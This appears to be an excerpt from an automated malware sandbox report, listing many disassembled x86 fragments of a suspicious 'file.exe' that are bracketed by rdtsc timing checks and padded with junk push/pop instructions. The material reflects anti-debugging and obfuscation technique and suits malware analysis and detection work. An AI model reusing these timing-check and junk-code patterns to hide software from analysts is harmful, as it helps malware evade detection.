Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0181 second address: 50A0193 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E6551CA3Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0193 second address: 50A0197 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A0197 second address: 50A01EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b push edx 0x0000000c mov cx, B36Fh 0x00000010 pop eax 0x00000011 mov bx, 9068h 0x00000015 popad 0x00000016 push dword ptr [ebp+04h] 0x00000019 jmp 00007F0E6551CA47h 0x0000001e push dword ptr [ebp+0Ch] 0x00000021 jmp 00007F0E6551CA46h 0x00000026 push dword ptr [ebp+08h] 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c mov bl, A4h 0x0000002e mov edi, ecx 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50A01EB second address: 50A01F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C0C03 second address: 50C0C27 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E6551CA41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov edx, 4D11B64Eh 0x00000013 mov dx, E95Ah 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C07C1 second address: 50C07D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E647B607Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C07D1 second address: 50C07D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C063B second address: 50C063F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C063F second address: 50C0643 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C0643 second address: 50C0649 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C0649 second address: 50C065E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E6551CA41h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C065E second address: 50C06DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E647B6081h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov edx, ecx 0x0000000f call 00007F0E647B6088h 0x00000014 pushfd 0x00000015 jmp 00007F0E647B6082h 0x0000001a adc esi, 24C63AE8h 0x00000020 jmp 00007F0E647B607Bh 0x00000025 popfd 0x00000026 pop ecx 0x00000027 popad 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007F0E647B607Eh 0x00000032 or cx, 4D48h 0x00000037 jmp 00007F0E647B607Bh 0x0000003c popfd 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C06DD second address: 50C06E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, AEh 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C06E4 second address: 50C0731 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 jmp 00007F0E647B607Ch 0x0000000d mov ebp, esp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push ebx 0x00000013 pop esi 0x00000014 pushfd 0x00000015 jmp 00007F0E647B6089h 0x0000001a sub cx, 3BC6h 0x0000001f jmp 00007F0E647B6081h 0x00000024 popfd 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C0731 second address: 50C074D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E6551CA41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d movzx esi, dx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C03D1 second address: 50C03D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C03D7 second address: 50C03DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C03DB second address: 50C03E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 pushad 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C03E8 second address: 50C041A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 mov dword ptr [esp], ebp 0x00000009 jmp 00007F0E6551CA3Eh 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F0E6551CA47h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D015D second address: 50D0163 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D0163 second address: 50D0169 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D0169 second address: 50D016D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D016D second address: 50D0171 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D0171 second address: 50D018D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0E647B6081h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51008F0 second address: 51008F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51008F6 second address: 51008FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51008FA second address: 510091B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F0E6551CA42h 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 510091B second address: 5100923 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov si, bx 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5100923 second address: 5100954 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, cx 0x00000006 pushfd 0x00000007 jmp 00007F0E6551CA3Eh 0x0000000c and ecx, 73E991A8h 0x00000012 jmp 00007F0E6551CA3Bh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov ebp, esp 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5100954 second address: 510095C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movsx ebx, cx 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E0344 second address: 50E034A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E034A second address: 50E034E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E034E second address: 50E0394 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and dword ptr [eax+04h], 00000000h 0x0000000c pushad 0x0000000d mov di, 28ECh 0x00000011 pushad 0x00000012 mov edx, 393A1E16h 0x00000017 mov bx, 05A2h 0x0000001b popad 0x0000001c popad 0x0000001d pop ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 mov di, ax 0x00000024 pushfd 0x00000025 jmp 00007F0E6551CA3Eh 0x0000002a sbb esi, 6E4C3238h 0x00000030 jmp 00007F0E6551CA3Bh 0x00000035 popfd 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C0518 second address: 50C051C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C051C second address: 50C0522 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C0522 second address: 50C0606 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 5DC543B1h 0x00000008 pushfd 0x00000009 jmp 00007F0E647B607Eh 0x0000000e adc ecx, 27198588h 0x00000014 jmp 00007F0E647B607Bh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, ebp 0x0000001e jmp 00007F0E647B6086h 0x00000023 push eax 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007F0E647B6081h 0x0000002b jmp 00007F0E647B607Bh 0x00000030 popfd 0x00000031 pushfd 0x00000032 jmp 00007F0E647B6088h 0x00000037 adc cx, 8578h 0x0000003c jmp 00007F0E647B607Bh 0x00000041 popfd 0x00000042 popad 0x00000043 xchg eax, ebp 0x00000044 pushad 0x00000045 call 00007F0E647B6084h 0x0000004a mov ch, 8Fh 0x0000004c pop edx 0x0000004d call 00007F0E647B607Ch 0x00000052 mov ebx, esi 0x00000054 pop eax 0x00000055 popad 0x00000056 mov ebp, esp 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b pushfd 0x0000005c jmp 00007F0E647B6086h 0x00000061 sbb cl, 00000068h 0x00000064 jmp 00007F0E647B607Bh 0x00000069 popfd 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C0606 second address: 50C060B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C060B second address: 50C0610 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D0E52 second address: 50D0E9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, dx 0x00000006 mov cx, di 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d pushad 0x0000000e jmp 00007F0E6551CA3Ch 0x00000013 pushfd 0x00000014 jmp 00007F0E6551CA42h 0x00000019 xor ecx, 39FA8AF8h 0x0000001f jmp 00007F0E6551CA3Bh 0x00000024 popfd 0x00000025 popad 0x00000026 mov dword ptr [esp], ebp 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c mov di, B8D4h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D0E9C second address: 50D0EC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov ebp, esp 0x00000007 jmp 00007F0E647B6086h 0x0000000c pop ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F0E647B607Ah 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D0EC8 second address: 50D0ECC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50D0ECC second address: 50D0ED2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E0152 second address: 50E0163 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 mov ah, bl 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50E0163 second address: 50E0169 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5100011 second address: 5100045 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, E852h 0x00000007 mov al, bl 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d pushad 0x0000000e pushad 0x0000000f call 00007F0E6551CA3Ah 0x00000014 pop esi 0x00000015 popad 0x00000016 mov ecx, edi 0x00000018 popad 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F0E6551CA43h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5100045 second address: 510004B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 510004B second address: 510004F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 510004F second address: 5100053 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5100053 second address: 5100068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0E6551CA3Ah 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5100068 second address: 510007A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E647B607Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 510007A second address: 51000A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E6551CA3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0E6551CA45h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51000A4 second address: 510013E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E647B6081h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F0E647B607Ch 0x00000011 sbb si, F7E8h 0x00000016 jmp 00007F0E647B607Bh 0x0000001b popfd 0x0000001c mov di, cx 0x0000001f popad 0x00000020 push eax 0x00000021 pushad 0x00000022 push eax 0x00000023 pushad 0x00000024 popad 0x00000025 pop edi 0x00000026 popad 0x00000027 xchg eax, ecx 0x00000028 pushad 0x00000029 call 00007F0E647B6084h 0x0000002e push esi 0x0000002f pop ebx 0x00000030 pop esi 0x00000031 push ebx 0x00000032 movzx eax, bx 0x00000035 pop edi 0x00000036 popad 0x00000037 mov eax, dword ptr [76FB65FCh] 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f movsx edx, ax 0x00000042 pushfd 0x00000043 jmp 00007F0E647B6088h 0x00000048 jmp 00007F0E647B6085h 0x0000004d popfd 0x0000004e popad 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 510013E second address: 51001AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0E6551CA47h 0x00000009 jmp 00007F0E6551CA43h 0x0000000e popfd 0x0000000f mov ecx, 265F3A4Fh 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 test eax, eax 0x00000019 jmp 00007F0E6551CA42h 0x0000001e je 00007F0ED7350213h 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 movsx edi, ax 0x0000002a jmp 00007F0E6551CA46h 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51001AC second address: 5100212 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0E647B6081h 0x00000009 sub esi, 5D93C646h 0x0000000f jmp 00007F0E647B6081h 0x00000014 popfd 0x00000015 call 00007F0E647B6080h 0x0000001a pop ecx 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e mov ecx, eax 0x00000020 pushad 0x00000021 mov al, dl 0x00000023 movzx eax, dx 0x00000026 popad 0x00000027 xor eax, dword ptr [ebp+08h] 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F0E647B6087h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5100212 second address: 5100288 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0E6551CA3Fh 0x00000009 sbb ecx, 0DBE2F8Eh 0x0000000f jmp 00007F0E6551CA49h 0x00000014 popfd 0x00000015 mov edx, esi 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a and ecx, 1Fh 0x0000001d jmp 00007F0E6551CA3Ah 0x00000022 ror eax, cl 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007F0E6551CA3Dh 0x0000002d xor esi, 2FBE3276h 0x00000033 jmp 00007F0E6551CA41h 0x00000038 popfd 0x00000039 mov eax, 40039567h 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5100288 second address: 510028D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 510028D second address: 5100293 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B0065 second address: 50B009E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushfd 0x00000008 jmp 00007F0E647B6082h 0x0000000d or ecx, 5F694278h 0x00000013 jmp 00007F0E647B607Bh 0x00000018 popfd 0x00000019 pop ecx 0x0000001a popad 0x0000001b mov ebp, esp 0x0000001d pushad 0x0000001e movsx edi, ax 0x00000021 push eax 0x00000022 push edx 0x00000023 mov bx, ax 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B009E second address: 50B00E1 instructions: 0x00000000 rdtsc 0x00000002 mov dx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 and esp, FFFFFFF8h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov ax, dx 0x00000011 pushfd 0x00000012 jmp 00007F0E6551CA43h 0x00000017 or ah, FFFFFF9Eh 0x0000001a jmp 00007F0E6551CA49h 0x0000001f popfd 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B00E1 second address: 50B00E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B00E8 second address: 50B011F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esp 0x00000008 jmp 00007F0E6551CA44h 0x0000000d mov dword ptr [esp], ecx 0x00000010 pushad 0x00000011 mov eax, 00CD269Dh 0x00000016 mov di, ax 0x00000019 popad 0x0000001a xchg eax, ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F0E6551CA3Bh 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B011F second address: 50B0125 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B0125 second address: 50B01C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F0E6551CA3Eh 0x0000000e xchg eax, ebx 0x0000000f pushad 0x00000010 pushad 0x00000011 call 00007F0E6551CA3Ch 0x00000016 pop ecx 0x00000017 call 00007F0E6551CA3Bh 0x0000001c pop ecx 0x0000001d popad 0x0000001e pushfd 0x0000001f jmp 00007F0E6551CA49h 0x00000024 and esi, 645594A6h 0x0000002a jmp 00007F0E6551CA41h 0x0000002f popfd 0x00000030 popad 0x00000031 mov ebx, dword ptr [ebp+10h] 0x00000034 pushad 0x00000035 mov esi, 3D464273h 0x0000003a popad 0x0000003b xchg eax, esi 0x0000003c jmp 00007F0E6551CA42h 0x00000041 push eax 0x00000042 pushad 0x00000043 movsx edi, si 0x00000046 popad 0x00000047 xchg eax, esi 0x00000048 push eax 0x00000049 push edx 0x0000004a jmp 00007F0E6551CA42h 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B01C4 second address: 50B0215 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 3DD13184h 0x00000008 movsx edx, cx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov esi, dword ptr [ebp+08h] 0x00000011 pushad 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 jmp 00007F0E647B607Ch 0x0000001d popad 0x0000001e xchg eax, edi 0x0000001f jmp 00007F0E647B6080h 0x00000024 push eax 0x00000025 pushad 0x00000026 mov di, 6C14h 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F0E647B6083h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B0215 second address: 50B0221 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 xchg eax, edi 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B0221 second address: 50B0227 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B0227 second address: 50B0269 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 6853F16Ah 0x00000008 jmp 00007F0E6551CA3Bh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 test esi, esi 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F0E6551CA44h 0x00000019 and al, 00000058h 0x0000001c jmp 00007F0E6551CA3Bh 0x00000021 popfd 0x00000022 push eax 0x00000023 push edx 0x00000024 mov di, cx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B0269 second address: 50B02FF instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F0E647B6082h 0x00000008 sbb esi, 6A4143B8h 0x0000000e jmp 00007F0E647B607Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 je 00007F0ED66343F8h 0x0000001d jmp 00007F0E647B6086h 0x00000022 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007F0E647B607Eh 0x00000030 xor eax, 36A41D48h 0x00000036 jmp 00007F0E647B607Bh 0x0000003b popfd 0x0000003c jmp 00007F0E647B6088h 0x00000041 popad 0x00000042 je 00007F0ED66343B0h 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b mov dl, FBh 0x0000004d push esi 0x0000004e pop ebx 0x0000004f popad 0x00000050 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B02FF second address: 50B0311 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E6551CA3Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50B0311 second address: 50B0315 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
